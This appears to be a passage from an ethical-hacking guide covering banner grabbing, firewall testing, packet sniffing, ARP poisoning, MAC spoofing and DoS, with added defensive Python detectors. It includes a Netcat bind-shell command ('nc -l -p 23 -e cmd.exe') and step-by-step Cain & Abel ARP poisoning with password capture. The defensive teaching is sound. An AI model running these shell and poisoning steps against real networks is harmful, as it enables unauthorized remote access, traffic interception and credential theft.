Figure 9-6 shows specific version information about an IceWarp e-mail server when telnetting to it on port 25. For help with telnet, simply enter telnet /? or telnet help for specific guidance on using the program.

Figure 9-6: Information gathered about an e-mail server via telnet.
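The banner-grabbing procedure above done programmatically, as an added example that is not code from the book: it handles both kinds of service (those that greet first, such as SMTP and POP3, and HTTP, which only answers a request) and is tested against two listeners started in-process. The IceWarp and Apache banners returned by those listeners are constructed for the demo, not captured from real systems.

```python
"""Added example (not from the book): a small banner grabber that does what
the telnet commands above do by hand, with a protocol-aware probe for HTTP,
which won't speak until you send a request. It is tested against two
listeners started in-process; their banners are constructed for the demo."""
import socket
import threading

# None means the service speaks first (FTP, SSH, SMTP, POP3); HTTP needs a request.
PROBES = {21: None, 22: None, 25: None, 110: None,
          80: b"HEAD / HTTP/1.0\r\nHost: target\r\n\r\n"}

def grab_banner(host, port, probe=None, timeout=3.0, limit=4096):
    """Connect, optionally send a probe, and return what the service says first."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        data = b""
        try:
            while len(data) < limit:
                chunk = s.recv(1024)
                if not chunk:                  # peer closed: we have everything
                    break
                data += chunk
                if b"\r\n\r\n" in data or (probe is None and b"\n" in data):
                    break                      # end of headers / first greeting line
        except socket.timeout:
            pass                               # service kept the line open; use what we got
    return data.decode("latin-1", "replace").strip()

def server_header(http_banner):
    """Pull the Server: value out of an HTTP response, or '' if it's suppressed."""
    for line in http_banner.splitlines():
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    return ""

def fake_service(greeting=None, http_reply=None):
    """Start a throwaway listener that either greets first or answers HTTP."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                if greeting is not None:
                    conn.sendall(greeting)
                else:
                    conn.settimeout(2.0)
                    try:
                        conn.recv(1024)             # wait for the client's request line
                    except socket.timeout:
                        pass
                    conn.sendall(http_reply)

    threading.Thread(target=serve, daemon=True).start()
    return srv

def demo():
    """Grab an SMTP-style greeting and an HTTP Server: header from local fakes."""
    smtp = fake_service(greeting=b"220 mail.example.test ESMTP IceWarp 11.4.5 (constructed)\r\n")
    web = fake_service(http_reply=b"HTTP/1.0 200 OK\r\nServer: Apache/2.2.15 (Unix) (constructed)\r\n"
                                  b"Content-Length: 0\r\n\r\n")
    try:
        smtp_banner = grab_banner("127.0.0.1", smtp.getsockname()[1])
        http_banner = grab_banner("127.0.0.1", web.getsockname()[1], PROBES[80])
    finally:
        smtp.close()
        web.close()
    return smtp_banner, server_header(http_banner)

if __name__ == "__main__":
    greeting, server = demo()
    print("SMTP:", greeting)
    print("HTTP Server header:", server or "(none, good)")
```

Running the same grabber after you've applied the banner countermeasures below is the quickest way to confirm that the version string really is gone rather than merely hidden from one client.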

Countermeasures against banner-grabbing attacks

The following steps can reduce the chance of banner-grabbing attacks:

- If there isn't a business need for services that offer banner information, disable those unused services on the network host.
- If there isn't a business need for the default banners, or if you can customize the banners, configure the network host's application or operating system to either disable the banners or remove information from the banners that could give an attacker a leg up. Check with your specific vendor for information on how to do this. TCP Wrappers in Linux is another solution.

If you can customize your banners, check with your lawyer about adding a warning banner. It won't stop banner grabbing but will show would-be intruders that the system is private and monitored (assuming it truly is). A warning banner may also help reduce your business liability in the event of a security breach. Here's an example:

Warning! This is a private system. All use is monitored and recorded. Any unauthorized use of this system may result in civil and/or criminal prosecution to the fullest extent of the law.

Testing firewall rules

As part of your ethical hacking, you can test your firewall rules to make sure they're working as they're supposed to.

Testing

A few tests can verify that your firewall actually does what it says it's doing. You can connect through the firewall on the ports that are open, but what about the ports that can be open but shouldn't be?

Netcat

Netcat (http://netcat.sourceforge.net) can test certain firewall rules without having to test a production system directly. For example, you can check whether the firewall allows port 23 (telnet) through. Follow these steps to see whether a connection can be made through port 23:

1. Load Netcat on a client machine inside the network.

This machine listens for the inbound test connection.

2. Load Netcat on a testing computer outside the firewall.

This allows you to test from the outside in.

3. Enter the Netcat listener command on the client (internal) machine with the port number you're testing.

For example, if you're testing port 23, enter this command:

nc -l -p 23 -e cmd.exe

The -e switch hands the accepted connection to cmd.exe. Not every Netcat build includes it; if yours doesn't, leave it off and the listener simply echoes what it receives, which still proves the port is reachable.

4. Enter the Netcat command to initiate an inbound session on the testing (external) machine. You must include the following information:

- The IP address of the internal machine you're testing (or the firewall's public address that forwards to it)
- The port number you're testing

For example, if the IP address of the internal (client) machine is 10.11.12.2 and the port is 23, enter this command:

nc -v 10.11.12.2 23

If Netcat presents you with a new command prompt (that's what the cmd.exe is for in Step 3) on the external machine, you've connected and can execute commands on the internal machine! This can serve several purposes, including testing firewall rules, network address translation (NAT), port forwarding and, well, uhhhmmm, executing commands on a remote system!

AlgoSec Firewall Analyzer

A commercial tool I often use with great results is AlgoSec's Firewall Analyzer (www.algosec.com) as shown in Figure 9-7.

Figure 9-7: Using AlgoSec Firewall Analyzer to uncover security gaffes in a firewall rulebase.

AlgoSec Firewall Analyzer, and similar ones such as SolarWinds Firewall Security Manager (www.solarwinds.com/firewall-security-manager.aspx), allows you to perform an in-depth analysis of firewall rulebases from all the major vendors and find security flaws and inefficiencies you'd never uncover otherwise. Firewall rulebase analysis is a lot like software source code analysis: it finds flaws at the source that humans would likely never see even when performing in-depth security tests from the Internet and the internal network. Typical findings are rules shadowed by an earlier, broader rule (so a deny never fires), stale "temporary" any/any rules, and services permitted that no longer exist. If you've never performed a firewall rulebase analysis, it's a must!

Countermeasures against firewall rulebase vulnerabilities

The following countermeasures can prevent a hacker from testing your firewall:

- Perform a firewall rulebase audit. I'm always saying that you cannot secure what you don't acknowledge. There's no better example of this than your firewall rulebases. No matter how seemingly simplistic your rulebase is, it never hurts to verify your work using an automated tool.
- Limit traffic to what's needed. Set rules on your firewall (and router, if needed) that pass only traffic that absolutely must pass. For example, have rules in place that allow HTTP inbound traffic to an internal web server, SMTP inbound traffic to an e-mail server, and HTTP outbound traffic for external web access. This is the best defense against someone poking at your firewall.
- Block ICMP to help prevent an external attacker from poking and prodding your network to see which hosts are alive.
- Enable stateful packet inspection on the firewall to block unsolicited requests.
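The rulebase audit recommended above, as an added example that is not code from the book or from AlgoSec: a first-pass analyzer over a vendor-neutral rule list that applies first-match semantics and reports rules that can never fire because an earlier rule already covers them (a deny hidden behind an allow being the finding that matters most) and allow rules that are effectively any/any. The rule fields and the sample rulebase are assumptions constructed for the demo.

```python
"""Added example (not from the book): a first-pass firewall rulebase audit of the
kind AlgoSec's Firewall Analyzer automates. It works on a vendor-neutral rule
list (constructed for the demo) and reports rules that can never match because
an earlier rule already covers them, and allow rules that are effectively
any/any. Field names and the sample rules are assumptions."""
import ipaddress

ANY = "any"

def rule(action, proto, src, dst, dport, comment=""):
    return {"action": action, "proto": proto, "src": src, "dst": dst,
            "dport": dport, "comment": comment}

def field_covers(x, y, is_net):
    """True if field value x matches everything field value y matches."""
    if x == ANY:
        return True
    if y == ANY:
        return False
    if is_net:
        return ipaddress.ip_network(y, strict=False).subnet_of(
            ipaddress.ip_network(x, strict=False))
    return x == y

def covers(a, b):
    """Rule a is at least as broad as rule b on every match field."""
    return (field_covers(a["proto"], b["proto"], False)
            and field_covers(a["src"], b["src"], True)
            and field_covers(a["dst"], b["dst"], True)
            and field_covers(a["dport"], b["dport"], False))

def analyze(rules):
    """Return findings as (rule_index, kind, detail) tuples, in rule order."""
    findings = []
    for i, r in enumerate(rules):
        # First-match semantics: an earlier rule that covers this one hides it.
        for j in range(i):
            if covers(rules[j], r):
                if r["action"] == "deny" and rules[j]["action"] == "allow":
                    kind = "shadowed-deny"      # the block you think you have isn't there
                else:
                    kind = "shadowed"           # dead rule; clutter, but not a hole
                findings.append((i, kind, f"never matches; rule {j} already covers it"))
                break
        if r["action"] == "allow" and r["src"] == ANY and r["dst"] == ANY and r["dport"] == ANY:
            findings.append((i, "permissive", "allow any->any on all ports"))
    return findings

# Constructed sample rulebase, evaluated top-down, first match wins.
SAMPLE_RULES = [
    rule("allow", "tcp", ANY, "192.168.1.10/32", 80, "public web server"),
    rule("allow", "tcp", ANY, "192.168.1.20/32", 25, "inbound mail"),
    rule("allow", ANY, ANY, ANY, ANY, "TEMP - vendor troubleshooting"),
    rule("allow", "tcp", "10.1.0.0/16", "192.168.1.10/32", 80, "branch office web"),
    rule("deny", "tcp", "203.0.113.0/24", "192.168.1.10/32", 80, "block abusive range"),
    rule("deny", ANY, ANY, ANY, ANY, "cleanup"),
]

if __name__ == "__main__":
    for idx, kind, detail in analyze(SAMPLE_RULES):
        print(f"rule {idx} [{kind}]: {SAMPLE_RULES[idx]['comment']}: {detail}")
```

Rule 4 is the instructive case: the administrator believes the abusive range is blocked, but rule 0 admits it first, and no amount of scanning from outside will reveal that the deny exists. A real product also checks address objects, time-based rules and NAT, which this sketch ignores.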

Analyzing network data

A network analyzer is a tool that allows you to look into a network and analyze data going across the wire for network optimization, security, and/or troubleshooting purposes. Like a microscope for a lab scientist, a network analyzer is a must-have tool for any security professional.

Network analyzers are often generically referred to as sniffers, though that's actually the name and trademark of a specific product, Network Associates' original Sniffer network analysis tool.

A network analyzer is handy for sniffing packets on the wire. A network analyzer is simply software running on a computer with a network card. It works by placing the network card in promiscuous mode, which makes the card pass up every frame it sees on the segment, even traffic not addressed to the network analyzer's host. The network analyzer performs the following functions:

- Captures all network traffic
- Interprets or decodes what is found into a human-readable format
- Displays the content in chronological order (or however you choose to see it)

When assessing security and responding to security incidents, a network analyzer can help you

- View anomalous network traffic and even track down an intruder.
- Develop a baseline of network activity and performance, such as protocols in use, usage trends, and MAC addresses, before a security incident occurs.

When your network behaves erratically, a network analyzer can help you

- Track and isolate malicious network usage
- Detect malicious Trojan horse applications
- Monitor and track down DoS attacks

Network analyzer programs

You can use one of the following programs for network analysis:

- Savvius OmniPeek (www.savvius.com) is one of my favorite network analyzers. It does everything I need and more and is very simple to use. OmniPeek is available for Windows operating systems.
- TamoSoft's CommView (www.tamos.com/products/commview) is a great, low-cost, Windows-based alternative.
- Cain & Abel (www.oxid.it/cain.html) is a free multifunctional password recovery tool for performing ARP poisoning, capturing packets, cracking passwords, and more.
- Wireshark (www.wireshark.org), formerly known as Ethereal, is a free alternative. I download and use this tool if I need a quick fix and don't have my laptop nearby. It's not as user-friendly as most of the commercial products, but it is very powerful if you're willing to learn its ins and outs. Wireshark is available for Windows, OS X, and Linux.
- ettercap (http://ettercap.github.io/ettercap/) is another powerful (and free) utility for performing network analysis and much more on Windows, Linux, and other operating systems.

Here are a few caveats for using a network analyzer:

- To capture all traffic, you must connect the analyzer to one of the following:
  - A hub on the network
  - A monitor/span/mirror port on a switch
  - A switch that you've performed an ARP poisoning attack on
- If you want to see traffic similar to what a network-based IPS sees, you should connect the network analyzer to a hub or switch monitor port (or even a network tap) on the outside of the firewall, as shown in Figure 9-8. This way, your testing enables you to view
  - What's entering your network before the firewall filters eliminate the junk traffic.
  - What's leaving your network after the traffic passes through the firewall.

Figure 9-8: Connecting a network analyzer outside the firewall.

Whether you connect your network analyzer inside or outside your firewall, you see immediate results. It can be an overwhelming amount of information, but you can look for these issues first:

- Odd traffic, such as:
  - An unusual amount of ICMP packets
  - Excessive amounts of multicast or broadcast traffic
  - Protocols that aren't permitted by policy or shouldn't exist given your current network configuration
- Internet usage habits, which can help point out malicious behavior of a rogue insider or system that has been compromised, such as:
  - Web surfing and social media
  - E-mail
  - Instant messaging and other P2P software
- Questionable usage, such as:
  - Many lost or oversized packets, indicating hacking tools or malware are present
  - High bandwidth consumption that might point to a web or FTP server that doesn't belong
- Reconnaissance probes and system profiling from port scanners and vulnerability assessment tools, such as a significant amount of inbound traffic from unknown hosts, especially over ports that aren't used very much, such as FTP or telnet.
- Hacking in progress, such as tons of inbound UDP or ICMP echo requests, SYN floods, or excessive broadcasts.
- Nonstandard hostnames on your network. For example, if your systems are named Computer1, Computer2, and so on, a computer named GEEKz4evUR should raise a red flag.
- Hidden servers (especially web, SMTP, FTP, DNS, and DHCP) that might be eating network bandwidth, serving illegal software, or accessing your network hosts.
- Attacks on specific applications that show such commands as /bin/rm, /bin/ls, echo, and cmd.exe as well as SQL queries and JavaScript injection, which I cover in Chapter 15.
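Several of the "look for these first" items above (reconnaissance probes, SYN floods, ICMP bursts, and the top-talker check that turns up hidden servers), together with the threshold rules from the port-scan countermeasures earlier in the chapter, implemented over the kind of packet summary an analyzer can export. This is an added example, not code from the book or from OmniPeek; the input records, addresses and thresholds are constructed for the demo.

```python
"""Added example (not from the book): the "look for these first" checks above,
plus the threshold rules from the port-scan countermeasures, implemented over
packet summaries of the kind an analyzer exports. Input is a constructed list
of (time, src, dst, proto, dport, tcp_flags, bytes) records; thresholds and
addresses are assumptions chosen for the demo."""
from collections import defaultdict

def detect(records, window=60, scan_ports=10, sweep_hosts=20, syn_rate=100, icmp_run=100):
    """Return a list of (kind, actor, detail) alerts. Counts are per time window."""
    ports_seen = defaultdict(set)      # (window, src) -> distinct host:port targets
    hosts_pinged = defaultdict(set)    # (window, src) -> distinct hosts pinged
    syns = defaultdict(int)            # (window, dst, dport) -> bare SYNs received
    icmp_in = defaultdict(int)         # (window, dst) -> echo requests received
    alerts, reported = [], set()

    for t, src, dst, proto, dport, flags, _size in records:
        w = int(t // window)
        if proto == "tcp":
            ports_seen[(w, src)].add((dst, dport))
            if flags == "S":                       # SYN without ACK: new connection attempt
                syns[(w, dst, dport)] += 1
        elif proto == "icmp" and dport == 8:       # echo request; ICMP type carried in dport
            hosts_pinged[(w, src)].add(dst)
            icmp_in[(w, dst)] += 1

    for (w, src), targets in ports_seen.items():
        if len(targets) >= scan_ports and ("scan", src) not in reported:
            reported.add(("scan", src))
            alerts.append(("port-scan", src, f"{len(targets)} distinct host:port targets in window {w}"))
    for (w, src), hosts in hosts_pinged.items():
        if len(hosts) >= sweep_hosts and ("sweep", src) not in reported:
            reported.add(("sweep", src))
            alerts.append(("ping-sweep", src, f"echo requests to {len(hosts)} hosts in window {w}"))
    for (w, dst, dport), n in syns.items():
        if n >= syn_rate and ("syn", dst, dport) not in reported:
            reported.add(("syn", dst, dport))
            alerts.append(("syn-flood", f"{dst}:{dport}", f"{n} bare SYNs in window {w}"))
    for (w, dst), n in icmp_in.items():
        if n >= icmp_run and ("icmp", dst) not in reported:
            reported.add(("icmp", dst))
            alerts.append(("icmp-flood", dst, f"{n} echo requests in window {w}"))
    return alerts

def top_talkers(records, n=3):
    """Hosts sending the most bytes; a surprise entry here is often a rogue server."""
    totals = defaultdict(int)
    for _, src, _, _, _, _, size in records:
        totals[src] += size
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)[:n]

def constructed_traffic():
    """Synthetic packet summaries standing in for an analyzer export."""
    recs = []
    # Normal web browsing from the office LAN.
    for i in range(50):
        recs.append((i * 1.0, "10.11.12.2", "93.184.216.34", "tcp", 443, "S", 60))
        recs.append((i * 1.0 + 0.1, "10.11.12.2", "93.184.216.34", "tcp", 443, "A", 1500))
    # One external host walks 30 ports on the mail server within a minute.
    for p in range(1, 31):
        recs.append((100 + p, "198.51.100.7", "192.168.1.20", "tcp", p, "S", 60))
    # A ping sweep of the internal /24 from a workstation that shouldn't be doing that.
    for h in range(1, 31):
        recs.append((200 + h * 0.5, "10.11.12.9", f"10.11.12.{h}", "icmp", 8, "", 84))
    # SYN flood at the web server from forged sources: 500 SYNs in ten seconds.
    for i in range(500):
        recs.append((300 + i * 0.02, f"203.0.113.{i % 200}", "192.168.1.10", "tcp", 80, "S", 60))
    # A hidden FTP server pushing a lot of data out of the network.
    for i in range(40):
        recs.append((400 + i, "10.11.12.33", "198.51.100.50", "tcp", 21, "A", 65000))
    return recs

if __name__ == "__main__":
    data = constructed_traffic()
    for kind, actor, detail in detect(data):
        print(f"{kind:<11} {actor:<20} {detail}")
    print("top talkers:", top_talkers(data))
```

The thresholds are deliberately simple fixed-window counts; that is also roughly what a firewall's rate-based rule does, which is why a slow scan with Nmap's Paranoid timing slips under both.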

You might need to let your network analyzer run for quite a while (several hours to several days, depending on what you're looking for). Before getting started, configure your network analyzer to capture and store the most relevant data:

- If your network analyzer permits it, configure it to use a first-in, first-out buffer. This configuration overwrites the oldest data when the buffer fills up, but it might be your only option if memory and hard drive space are limited on your network analysis computer.
- If your network analyzer permits it, record all the traffic into a capture file and save it to the hard drive. This is the ideal scenario, especially if you have a large hard drive, such as 500GB or more.

You can easily fill several hundred gigabytes' worth of hard drive space in a short period. I highly recommend running your network analyzer in what OmniPeek calls monitor mode. This allows the analyzer to keep track of what's happening, such as network usage and protocols, but not capture and store every single packet. Monitor mode, if supported by your analyzer, is very beneficial and is often all you need.

When network traffic doesn't look right in a network analyzer, it probably isn't. It's better to be safe than sorry.

Run a baseline when your network is working normally. When you have a baseline, you can see any obvious abnormalities when an attack occurs.

One thing I like to check for is the top talkers (network hosts sending/receiving the most traffic) on the network. If someone is doing something malicious on the network, such as hosting an FTP server or running Internet file-sharing software, using a network analyzer is often the only way you'll find out about it. A network analyzer is also a good tool for detecting systems infected with malware, such as a virus or Trojan horse. Figure 9-9 shows what it looks like to have a suspect protocol or application running on your network.

Figure 9-9: OmniPeek can help uncover someone running an illicit system, such as an FTP server.

Looking at your network statistics, such as bytes per second, network utilization, and inbound/outbound packet counts, is also a good way to determine whether something fishy is going on. Figure 9-10 contains network statistics as seen through the powerful CommView network analyzer.

Figure 9-10: CommView's interface for viewing network statistics.

TamoSoft, the maker of CommView, has another product called NetResident (www.tamos.com/products/netresident) that can track the usage of well-known protocols, such as HTTP, e-mail, FTP, and VoIP. As shown in Figure 9-11, you can use NetResident to monitor web sessions and play them back.

Figure 9-11: NetResident can track Internet usage and ensure security policies are enforced.

NetResident also has the capability to perform ARP poisoning via its PromiSwitch tool available under the Tools menu, which allows NetResident to see everything on the local network segment. I cover ARP poisoning in the section "The MAC-daddy attack," later in this chapter.

Countermeasures against network protocol vulnerabilities

A network analyzer can be used for good or evil. The good is to help ensure your security policies are being followed. The evil is when someone uses a network analyzer against you. A few countermeasures can help prevent someone from using an unauthorized network analyzer, although there's no way to prevent it completely.

If an external attacker or malicious user can connect to your network (physically or wirelessly), he can capture packets on the network, even if you're using an Ethernet switch.

Physical security

Ensure that adequate physical security is in place to prevent someone from plugging into your network:

- Keep the bad guys out of your server room and wiring closet.
- Ensure that the web, telnet, and SSH management interfaces on your Ethernet switches are especially secure to keep someone from changing the switch port configuration and seeing everything going across the wire.
- Make sure that unsupervised areas, such as an unoccupied lobby or training room, don't have live network connections.

For details about physical security, see Chapter 7.

Network analyzer detection

You can use a network- or host-based utility to determine whether someone is running an unauthorized network analyzer on your network:

- Sniffdet (http://sniffdet.sourceforge.net) for UNIX-based systems
- PromiscDetect (http://ntsecurity.nu/toolbox/promiscdetect) for Windows

Certain IPSs can also detect whether a network analyzer is running on your network. These tools enable you to monitor the network for Ethernet cards that are running in promiscuous mode. You simply load the programs on your computer, and the programs alert you if they see promiscuous behaviors on the network (Sniffdet) or local system (PromiscDetect). The network-based test works by sending probes, such as an ARP request addressed to a bogus unicast MAC, that a normally configured card discards in hardware but a promiscuous card passes up to the stack, which then answers. It only catches hosts that respond, so treat a clean result as absence of evidence rather than proof.

The MAC-daddy attack

Attackers can use ARP (Address Resolution Protocol) running on your network to make their systems appear as your system or another authorized host on your network.

ARP spoofing

An excessive number of ARP requests can be a sign of an ARP spoofing attack (also called ARP poisoning) on your network.

A client running a program, such as dsniff (www.monkey.org/~dugsong/dsniff) or Cain & Abel (www.oxid.it/cain.html), can change the ARP tables (the tables that store IP address to media access control (MAC) address mappings) on network hosts. This causes the victim computers to think they need to send traffic to the attacker's computer rather than to the true destination computer when communicating on the network. ARP spoofing is used during man-in-the-middle (MITM) attacks.

A related trick targets the switch itself rather than the hosts: flooding it with frames from thousands of forged source MAC addresses fills its MAC address table, and many switches then fail open and flood unicast frames out every port, essentially turning the switch into a hub. When this occurs, an attacker can sniff every packet going through the switch and capture anything and everything from the network. ARP poisoning doesn't need the switch to misbehave; it works on the victims' ARP caches and leaves the switch forwarding normally.

This weakness is inherent in ARP itself: replies carry no authentication, and hosts accept them, even unsolicited ones, and update their caches accordingly.

Here's a typical ARP spoofing attack with a hacker's computer (Hacky) and two legitimate network users' computers (Joe and Bob):

1. Hacky poisons the ARP caches of victims Joe and Bob by using dsniff, ettercap, or a utility he wrote.

2. Joe associates Hacky's MAC address with Bob's IP address.

3. Bob associates Hacky's MAC address with Joe's IP address.

4. Joe's traffic and Bob's traffic are sent to Hacky's MAC address first.

5. Hacky's network analyzer captures Joe's and Bob's traffic.

If Hacky is configured to act like a router and forward packets, it forwards the traffic to its original destination. The original sender and receiver never know the difference!

Using Cain & Abel for ARP poisoning

You can perform ARP poisoning on your switched Ethernet network to test your IPS or to see how easy it is to pull other hosts' traffic through your own machine and capture anything and everything with a network analyzer.

ARP poisoning can be hazardous to your network's hardware and health, causing downtime and more. So be careful!

Perform the following steps to use Cain & Abel for ARP poisoning:

1. Load Cain & Abel and then click the Sniffer tab to enter the network analyzer mode.

The Hosts page opens by default.

2. Click the Start/Stop APR icon (the yellow and black circle).

The ARP poison routing (how Cain & Abel refers to ARP poisoning) process starts and enables the built-in sniffer.

3. If prompted, select the network adapter in the window that appears and then click OK.

4. Click the blue + icon to add hosts to perform ARP poisoning on.

5. In the MAC Address Scanner window that appears, ensure the All Hosts in My Subnet option is selected and then click OK.

6. Click the APR tab (the one with the yellow-and-black circle icon) to load the APR page.

7. Click the white space under the uppermost Status column heading (just under the Sniffer tab).

This re-enables the blue + icon.

8. Click the blue + icon and the New ARP Poison Routing window shows the hosts discovered in Step 5.

9. Select your default route (in my case, 10.11.12.1).

The right-hand column fills with all the remaining hosts, as shown in Figure 9-12.

10. Ctrl+click all the hosts in the right column that you want to poison.

11. Click OK and the ARP poisoning process starts.

This process can take anywhere from a few seconds to a few minutes depending on your network hardware and each host's local TCP/IP stack. The results of ARP poisoning on my test network are shown in Figure 9-13.

12. You can use Cain & Abel's built-in passwords feature to capture passwords traversing the network to and from various hosts simply by clicking the Passwords tab.

Figure 9-12: Selecting your victim hosts for ARP poisoning in Cain & Abel.

Figure 9-13: ARP poisoning results in Cain & Abel.

The preceding steps show how easy it is to exploit this weakness and prove that Ethernet switches aren't all they're cracked up to be from a security perspective.

MAC address spoofing

MAC address spoofing tricks the switch into thinking your computer is something else. You simply change your computer's MAC address and masquerade as another user.

You can use this trick to test access control systems, such as your IPS/firewall, and even your operating system login controls that check for specific MAC addresses.

UNIX-based systems

In UNIX and Linux, you can spoof MAC addresses with the ifconfig utility. Follow these steps:

1. While logged in as root, use ifconfig to enter a command that disables the network interface.

Insert the network interface name that you want to disable (usually, eth0) into the command, like this:

[root@localhost root]# ifconfig eth0 down

2. Enter a command for the MAC address you want to use.

Insert the fake MAC address and the network interface name (eth0) into the command again, like this:

[root@localhost root]# ifconfig eth0 hw ether new_mac_address

Bring the interface back up with ifconfig eth0 up afterwards. On current Linux distributions that no longer ship ifconfig, the iproute2 command ip link set dev eth0 address new_mac_address does the same job.

You can use a more feature-rich utility called GNU MAC Changer (https://github.com/alobbs/macchanger) for Linux systems.

Windows

You can use regedit to edit the Windows Registry, but I like using a neat Windows utility called SMAC (www.klcconsulting.net/smac), which makes MAC spoofing a simple process. Follow these steps to use SMAC:

1. Load the program.

2. Select the adapter for which you want to change the MAC address.

3. Enter the new MAC address in the New Spoofed MAC Address fields and click the Update MAC button.

4. Stop and restart the network card with these steps:

a. Right-click the network card in Network and Dialup Connections and then choose Disable.

b. Right-click again and then choose Enable for the change to take effect.

You might have to reboot for this to work properly.

5. Click the Refresh button in the SMAC interface.

To reverse Registry changes with SMAC, follow these steps:

1. Select the adapter for which you want to change the MAC address.

2. Click the Remove MAC button.

3. Stop and restart the network card with these steps:

a. Right-click the network card in Network and Dialup Connections and then choose Disable.

b. Right-click again and then choose Enable for the change to take effect.

You might have to reboot for this to work properly.

4. Click the Refresh button in the SMAC interface.

You should see your original MAC address again.

Countermeasures against ARP poisoning and MAC address spoofing attacks

A few countermeasures on your network can minimize the effects of an attack against ARP and MAC addresses:

- Prevention: You can prevent MAC address spoofing if your switches can enable port security to prevent automatic changes to the MAC address tables. Port security limits which, or how many, source MACs a port will learn; it won't stop a host that copies the MAC of the legitimate device on its own port.

Static ARP entries on every host are the textbook answer to ARP poisoning, and maintaining them is something that hardly any network administrator has time to do in today's rat race. The practical option on managed switches is Dynamic ARP Inspection, normally paired with DHCP snooping, which drops ARP replies whose IP-to-MAC binding doesn't match what the switch learned from DHCP.

- Detection: You can detect these two types of hacks through an IPS or a standalone MAC address-monitoring utility.

Arpwatch (http://linux.maruhn.com/sec/arpwatch.html) is a Linux-based program that alerts you via e-mail when it detects changes in MAC addresses associated with specific IP addresses on the network.
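An arpwatch-style monitor run over a constructed sequence of ARP replies, as an added example that is not code from the book or from arpwatch. It shows the three signals the Hacky/Joe/Bob attack above leaves on the wire: an IP whose MAC suddenly changes, one MAC answering for several IPs (the gateway among them), and the steady re-poisoning traffic that keeps the victims' caches stale, which is the "excessive number of ARP packets" the ARP spoofing section mentions. The addresses, timings and thresholds are assumptions.

```python
"""Added example (not from the book): an arpwatch-style monitor run over a
constructed sequence of ARP replies, showing the three signals of the Hacky/
Joe/Bob attack above: an IP whose MAC suddenly changes, one MAC claiming
several IPs (the gateway among them), and the steady re-poisoning traffic
that keeps victims' caches stale. Addresses and thresholds are assumptions."""
from collections import defaultdict, deque

GATEWAY_MAC = "aa:bb:cc:00:00:01"
HACKY_MAC = "de:ad:be:ef:00:03"

def watch_arp(replies, flood_threshold=8, flood_window=5.0):
    """replies: iterable of (time, sender_ip, sender_mac) taken from ARP replies
    seen on the segment. Returns alerts as (kind, detail) tuples."""
    ip_to_mac = {}                                 # what the segment has claimed so far
    mac_to_ips = defaultdict(set)
    recent = defaultdict(deque)                    # mac -> timestamps of its recent replies
    flooded, alerts = set(), []

    for t, ip, mac in replies:
        mac = mac.lower()
        old = ip_to_mac.get(ip)
        if old is None:
            ip_to_mac[ip] = mac
            mac_to_ips[mac].add(ip)
        elif old != mac:
            # The textbook arpwatch "changed ethernet address" event.
            alerts.append(("changed", f"{ip}: {old} -> {mac} at t={t}"))
            others = sorted(mac_to_ips[mac] - {ip})
            if others:
                # Same card now answering for two addresses: classic MITM signature.
                alerts.append(("duplicate", f"{mac} claims {ip} and {', '.join(others)}"))
            mac_to_ips[old].discard(ip)
            ip_to_mac[ip] = mac
            mac_to_ips[mac].add(ip)

        q = recent[mac]
        q.append(t)
        while q and t - q[0] > flood_window:
            q.popleft()
        if len(q) > flood_threshold and mac not in flooded:
            # Poisoners re-send every second or so to keep the victims' caches overwritten.
            flooded.add(mac)
            alerts.append(("flood", f"{mac}: {len(q)} replies in {flood_window}s"))
    return alerts

def constructed_replies():
    """Synthetic capture: normal traffic, then Hacky poisons the gateway and Joe."""
    replies = [
        (0.0, "10.11.12.1", GATEWAY_MAC),            # gateway
        (1.0, "10.11.12.2", "aa:bb:cc:00:00:02"),    # Joe
        (2.0, "10.11.12.3", HACKY_MAC),              # Hacky, still honest
    ]
    for i in range(10, 25):                          # re-poisoned once per second
        replies.append((float(i), "10.11.12.1", HACKY_MAC))        # "gateway is at Hacky"
        replies.append((float(i) + 0.5, "10.11.12.2", HACKY_MAC))  # "Joe is at Hacky"
    return replies

if __name__ == "__main__":
    for kind, detail in watch_arp(constructed_replies()):
        print(f"[{kind}] {detail}")
```

A legitimate change (a replaced NIC, a DHCP lease moving to another machine) also produces a single "changed" event; what separates an attack is the "duplicate" claim on the gateway address and the repeated replies behind it.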

What you need to know about advanced malware

Advanced malware (also known as advanced persistent threat or APT) has been all the rage lately. Such targeted attacks are highly sophisticated and extremely difficult to detect, that is, unless you have the proper controls at the network and/or host layers. I once worked on a project where a large enterprise was targeted by a nation state (presumably because of the line of work the enterprise was in) and ended up having over 10,000 Windows servers and workstations infected by malware. The enterprise's traditional, big box antivirus software was none the wiser. The project turned out to be an extensive exercise in incident response and forensics. The infection was traced back to a phishing attack that subsequently spread to all the systems while, at the same time, installing password-cracking tools to attempt to crack the local SAM file on each Windows machine.

This advanced malware infection is just one of countless examples of new advanced malware that most organizations are not prepared to prevent. The obvious solution to prevent such attacks is to keep users from clicking malicious links and to prevent malware from being "dropped" onto the system. That's tough, if not impossible, to prevent. The next best thing is to use technology to your advantage. Advanced malware monitoring and threat protection tools such as Damballa Failsafe (www.damballa.com/solutions/damballa_failsafe.php), next-generation firewalls such as what's offered by Palo Alto Networks (www.paloaltonetworks.com), and whitelisting, a.k.a. "positive security," technologies such as the Bit9 Security Platform (www.bit9.com/solutions/security-platform) that help protect the host are a great way to fight this threat.

The bottom line: Don't underestimate the risk and power of targeted malware attacks.

Testing denial of service attacks

Denial of service (DoS) attacks are among the most common hacker attacks. A hacker initiates so many invalid requests to a network host that the host uses all its resources responding to the invalid requests and ignores the legitimate requests.

DoS attacks

DoS attacks against your network and hosts can cause systems to crash, data to be lost, and every user to jump on your case wondering when Internet access will be restored.

Here are some common DoS attacks that target an individual computer or network device:

- SYN floods: The attacker floods a host with TCP SYN packets, usually from forged source addresses, so the host fills its queue of half-open connections waiting for final ACKs that never arrive.
- Ping of Death: The attacker sends IP packets that exceed the maximum length of 65,535 bytes, which can ultimately crash the TCP/IP stack on many operating systems.
- WinNuke: This attack can disable networking on older Windows 95 and Windows NT computers.

